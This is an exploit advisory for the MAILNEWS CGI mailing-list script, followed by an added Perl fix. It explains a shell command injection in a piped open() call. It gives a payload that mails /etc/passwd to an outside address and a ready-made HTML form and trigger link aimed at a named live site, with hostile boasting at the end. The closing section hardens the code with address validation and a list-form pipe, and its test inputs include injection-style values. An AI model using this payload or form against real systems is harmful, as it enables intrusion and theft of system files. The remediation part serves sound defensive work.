Hello BuGReaders...

##Script: mailnews.cgi

##Introduction:

<cat from source>
CGI-Script MAILNEWS 1.3
This script helps you to maintain a mailinglist.
</cat>

##Tested Version: 1.1, 1.3

The author does not filter certain characters and uses a very stupid "password
protection". We can add or delete users from the mailing list without knowing
the admin password. But this is a small problem ;] . Let's see what more we
can do.
<cat source>
        open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
</cat>
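where $mailprog [default] is sendmail and $member is a user from the users file.
Because this one-string form of open hands the whole command line to the shell,
anything after a ";" in $member runs as a separate command.
Now we can do something like this: add the user "; cat /etc/passwd | mail
[EMAIL PROTECTED]" and use the subroutine to execute this code :]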

Simple exploit in html:

<HTML>
<BODY>
<FORM
ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
<INPUT type=hidden NAME="action" value="subscribe">
<BR>
User to add with ;  [e.g. " ; cat /etc/passwd |mail [EMAIL PROTECTED]"
without quotes, of course ]<INPUT NAME="address" TYPE="TEXT">
<INPUT  TYPE="SUBMIT" VALUE="Submit">
</FORM>
<BR>
<A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news">
Execute command :] </A>
<CENTER> Peace... </CENTER>
</BODY>
</HTML>

Who :   Kanedaaa
        [EMAIL PROTECTED]


***$$$###  " And maybe very many will not understand these words...
                But there is no mercy for SONS OF BITCHES .... " ###$$*
[EMAIL PROTECTED] Hero ... Boss ... Abuser ... Cucumber Team Member... Bzz..
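
The fix for the `open (MAIL, "|$mailprog $member")` line quoted above, as an added example that is not part of the original advisory or of the MAILNEWS source: validate the address before it reaches the users file, and open the pipe in list form so no shell parses `$member`. The sendmail path, the `valid_address` and `send_to_member` names, and the sample entries are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumption: location of the mail program; the advisory only says the
# default $mailprog is sendmail.
my $mailprog = '/usr/sbin/sendmail';

# Hypothetical helper: conservative allow-list for a subscriber address.
# Rejects shell metacharacters, whitespace, embedded newlines, and a
# leading '-' that the mail program could read as an option.
sub valid_address {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return $addr =~ /\A[A-Za-z0-9][A-Za-z0-9._+-]*\@[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?\z/
        ? 1 : 0;
}

# Hardened replacement for:  open (MAIL, "|$mailprog $member")
# The list form of a pipe open execs the program directly, so $member is
# passed as a single argument and never interpreted by /bin/sh.
sub send_to_member {
    my ($member, $body) = @_;
    die "refusing invalid address\n" unless valid_address($member);
    open(my $mail, '|-', $mailprog, '-oi', '--', $member)
        or die "Can't run $mailprog: $!\n";
    print {$mail} $body;
    close($mail) or warn "$mailprog exited with status $?\n";
}

# Constructed sample entries, as they might be submitted to "subscribe".
# Only the validator is exercised here, so the script runs without an MTA.
for my $entry ('alice@example.org',
               'bob@example.org; id',
               '-oQ/tmp@example.org',
               "carol\@example.org\n") {
    (my $shown = $entry) =~ s/\n/\\n/g;
    printf "%-24s %s\n", $shown, valid_address($entry) ? 'accepted' : 'rejected';
}
```

Only the first sample entry is accepted; the check belongs in the subscribe handler as well as in the send path, since entries already in the users file were never validated.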
